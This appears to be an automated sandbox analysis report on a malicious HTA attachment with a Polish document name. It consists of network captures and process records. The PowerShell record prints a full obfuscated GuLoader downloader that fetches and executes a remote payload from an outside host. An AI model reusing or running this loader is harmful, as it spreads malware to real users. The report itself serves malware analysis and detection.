                                                                                                              2024-05-01 23:14:22 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64
                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
                                                                                                              2024-05-01 23:14:22 UTC1255INData Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 30 70 38 79 31 54 5a 50 5f 61 68 34 4f 36 64 31 69 66 63 58 44 2d 2d 72 68 6b 63 6f 56 49 56 68 6d
                                                                                                              Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="0p8y1TZP_ah4O6d1ifcXD--rhkcoVIVhm
                                                                                                              2024-05-01 23:14:22 UTC959INData Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e
                                                                                                              Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.54972020.12.23.50443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-05-01 23:14:24 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=4LRrbP6CoH7uBLr&MD=X1ONPB1b HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: */*
                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                              Host: slscr.update.microsoft.com
                                                                                                              2024-05-01 23:14:24 UTC560INHTTP/1.1 200 OK
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Content-Type: application/octet-stream
                                                                                                              Expires: -1
                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                              MS-CorrelationId: a393436e-e60e-4418-82f7-96088caddc6a
                                                                                                              MS-RequestId: 95bf2157-a1b7-4046-9e38-a81ac92536e9
                                                                                                              MS-CV: fF+dAtgtx0WnAWUx.0
                                                                                                              X-Microsoft-SLSClientCache: 2880
                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Date: Wed, 01 May 2024 23:14:24 GMT
                                                                                                              Connection: close
                                                                                                              Content-Length: 24490
                                                                                                              2024-05-01 23:14:24 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                              2024-05-01 23:14:24 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              7192.168.2.54972723.1.237.91443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-05-01 23:14:27 UTC2148OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                              Origin: https://www.bing.com
                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                              Accept: */*
                                                                                                              Accept-Language: en-CH
                                                                                                              Content-type: text/xml
                                                                                                              X-Agent-DeviceId: 01000A410900D492
                                                                                                              X-BM-CBT: 1696428841
                                                                                                              X-BM-DateFormat: dd/MM/yyyy
                                                                                                              X-BM-DeviceDimensions: 784x984
                                                                                                              X-BM-DeviceDimensionsLogical: 784x984
                                                                                                              X-BM-DeviceScale: 100
                                                                                                              X-BM-DTZ: 120
                                                                                                              X-BM-Market: CH
                                                                                                              X-BM-Theme: 000000;0078d7
                                                                                                              X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                                                              X-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22
                                                                                                              X-Device-isOptin: false
                                                                                                              X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                              X-Device-OSSKU: 48
                                                                                                              X-Device-Touch: false
                                                                                                              X-DeviceID: 01000A410900D492
                                                                                                              X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticsh
                                                                                                              X-MSEdge-ExternalExpType: JointCoord
                                                                                                              X-PositionerType: Desktop
                                                                                                              X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                              X-Search-CortanaAvailableCapabilities: None
                                                                                                              X-Search-SafeSearch: Moderate
                                                                                                              X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                                                                              X-UserAgeClass: Unknown
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                              Host: www.bing.com
                                                                                                              Content-Length: 2484
                                                                                                              Connection: Keep-Alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1714605232991&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
                                                                                                              2024-05-01 23:14:27 UTC1OUTData Raw: 3c
                                                                                                              Data Ascii: <
                                                                                                              2024-05-01 23:14:27 UTC2483OUTData Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 33 36 34 34 46 44 37 34 44 46 31 36 36 31 38 46 30 38 46 37 45 43 30 33 44 45 35 35 36 30 30 31 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 37 35 32 32 38 31 35 36 37 30 33 41 34 30 44 35 42 39 37 45 35 41 36 38 33 36 46 32 41 31 43 45 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49
                                                                                                              Data Ascii: ClientInstRequest><CID>3644FD74DF16618F08F7EC03DE556001</CID><Events><E><T>Event.ClientInst</T><IG>75228156703A40D5B97E5A6836F2A1CE</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
                                                                                                              2024-05-01 23:14:28 UTC479INHTTP/1.1 204 No Content
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              X-MSEdge-Ref: Ref A: 4345EE36A03D499BA0A7C59FFB288B5D Ref B: LAX311000108017 Ref C: 2024-05-01T23:14:28Z
                                                                                                              Date: Wed, 01 May 2024 23:14:28 GMT
                                                                                                              Connection: close
                                                                                                              Alt-Svc: h3=":443"; ma=93600
                                                                                                              X-CDN-TraceID: 0.57ed0117.1714605268.5759083


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.54973420.12.23.50443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-05-01 23:15:06 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=4LRrbP6CoH7uBLr&MD=X1ONPB1b HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: */*
                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                              Host: slscr.update.microsoft.com
                                                                                                              2024-05-01 23:15:07 UTC560INHTTP/1.1 200 OK
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Content-Type: application/octet-stream
                                                                                                              Expires: -1
                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                              ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                              MS-CorrelationId: 5fd93b0f-cdc7-46e5-a982-db3bd6076372
                                                                                                              MS-RequestId: 236f0631-b103-49de-a586-455877f8bb1f
                                                                                                              MS-CV: BFVoo1IMe0SEdIPB.0
                                                                                                              X-Microsoft-SLSClientCache: 2160
                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Date: Wed, 01 May 2024 23:15:06 GMT
                                                                                                              Connection: close
                                                                                                              Content-Length: 25457
                                                                                                              2024-05-01 23:15:07 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                                              Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                                              2024-05-01 23:15:07 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                                              Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:0
                                                                                                              Start time:01:14:02
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:mshta.exe "C:\Users\user\Desktop\PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta"
                                                                                                              Imagebase:0x6a0000
                                                                                                              File size:13'312 bytes
                                                                                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:1
                                                                                                              Start time:01:14:03
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teShunnFundtOver ');Oraklerne (Bortledede ' Spe$ BasSTrsktQ,inaDatatSam iGennsVuggt ndsi,debkDalieColdr.hirspana.CracHuncueThroawa.edP.ogeUndirThe sSyns[Lder$ Conpundir TauoConslLictoPyrog.kraf,eamo BolrSpect GhuoAarelGreyk Kole nskrFdesest,a] nd=In,x$BirsRHaemhinane SaloNovap.pech P woSemirSanie Is ');$Jotas=Bortledede 'BrilS,evrtNonea Ho.tKyndiGodds R,ttSe,viguldk lawe ikar BeksCher.D.ntDUnyooTilbw No nE.lblEquaoUku.aCo.ndFladFUnsliCorrl Fore ryp(U,de$TranRExtee G,onRectpSuperFartiEgsjsEmbrePle,nAlka, .ra$Fl rN Rape BesvA.coiDelilPin,lProde Nons Sk ) imp ';$Jotas=$Frogmen[1]+$Jotas;$Nevilles=$Frogmen[0];Oraklerne (Bortledede 'M mm$Dameg .psl,lvso Ma bSpejaEndulfy.r: HjlGLejea KallKarri lord SejiG.imaVerd=Malp(SkudTBoate .issUintt Fri-Har,PClipasprit RavhUngr Disk$fejlN rheArbevHob.iL.tmlLys.lFo.teKon,s Van)Supe ');while (!$Galidia) {Oraklerne (Bortledede 'Fnat$Lenig SkalFrplo OphbIn.iaSuc l ur:DryeY.rowdGalirCo se Polr OpsnBl geNon,= nn$ScratEfter Endu,rleeDdss ') ;Oraklerne $Jotas;Oraklerne (Bortledede 'Un,vSAlchtR.meaP.nsrSlv.tW,tt-,uttSBeholInqueTe.meEskipFolk Kna.4 Non ');Oraklerne (Bortledede 'Forb$SamugrenolU.aboety.bHasma Fa,lma.r:tilhGPrj,aPolllso eiAfkrdMentiComaaitch=L,sk(AcraTSamoeSub sIsoctU,ad-Re,pPPse.aBengtNondhPagt Mast$ Ma,NTrane triv KlaiYurul Ratl v,leBiocsUnme)Esc. ') ;Oraklerne (Bortledede 'Bi t$KlimgStamlTempofngeb,ndeaDi clTaxa:H,reF D so ForrTu ksBagtiUdstk.frerskakiAjstn dengSub,sUnisuN ned MicgEngii,sylf.lagt ipe= .de$SoldgGyrol elvo TegbK.olaAntilColl:MunkJCabauOlied ,tnaSig iGowfs denmGaule .ff+gorg+I.ra% Ko,$RehnDOr.eiMetasBatcpFinaoTalmnGebeePol,n fo,tAcoee GlonPellhPhotePredd SeieGastn Apo.ImoecVerboSnoluT,kenForetColl ') ;$Renprisen=$Disponentenheden[$Forsikringsudgift];}Oraklerne (Bortledede ' Ho.$Bit.g CerlUdlaoOv rbRepea T,plPl t:S bnSDelfy NedvFlngaH,fta CobrBoarsPam.dHa lr Bree Cirn Speg oseCons skri=Bis. NickGCrype TvitReco-DitrC OveoUdginBagatPonde D.sn UnctEter Gen$Fo.uNspise Bugv D ciDobblSylll,ryge Eles mo, ');Oraklerne (Bortledede 'Beun$VaaggImp lNiu oO llbTrttabojal Smo:AnalD A.meLangcUnhooH mmmArrhpQ.anrO.spe libsOb asUniniPostvS aae Dek Un e=Havf Pelo[ arcSParky ddysselvtRet.eAflamFyrp.CompCmejso Vren SynvP,oteAarsrSnortFaxe]excu: rd:SkraFDolkr I,soHoflm ayeBAf.oa UdlsPseueS aa6Robo4OxydSMunitProsrBrakiSkuen ExcgBria(Band$UdlaSUnsyyMothv ph,a .isaMun.r Fols Svad ud r .ave ResnOutbgD iveA.da)Inge ');Oraklerne (Bortledede ' aci$Overg Aabl ibroCe,tbStj.a D,nlForl:SextSFanta,rimaIncomCouna .chsHammk,rskiOplanCh,leFllesPara Wood= Han Cu v[ .prSDemoy,rops FirtSp deUform K.m. KapT CaceSl,axNonitThe..Vas EAr enTermc .loo ,ondundeiRippnredegDoo,]Dise:Imbe:BeelAReseSBeskCT ocIUndiI Op.. gleGYasheHositPo,lSKundtModsrEpuli,lagnUnw.gSyn.( dr$ .asDHenhePlaucsengoAn um SubpTararAcc eFilmsThussNutmi Uidv.alle Se )Unso ');Oraklerne (Bortledede 'Skol$e fogCroolLorgoFli,bFlueaCu wlGrun:DimpE.anscHannoUn,onFireoEnstm TiliP,riz PhiaLongtTilli,anio,eadnOutl=Fore$barnSf eea kroa hopmRetaaPrecsSydvkChemi,mstn ueleT,lhsVeri.MechsBasiu SkibPlaysP,pitDiskrSi.aiConcnSa igDelo(Reco3,urv2Ting4 Cau8Hydr1Lame0Chem,Slb.2Sun 7,jae9Sukk2 Ove5Kl.g)Skel ');Oraklerne $Economization;"
                                                                                                              Imagebase:0x7a0000
                                                                                                              File size:433'152 bytes
                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.2795865098.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:2
                                                                                                              Start time:01:14:03
                                                                                                              Start date:02/05/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
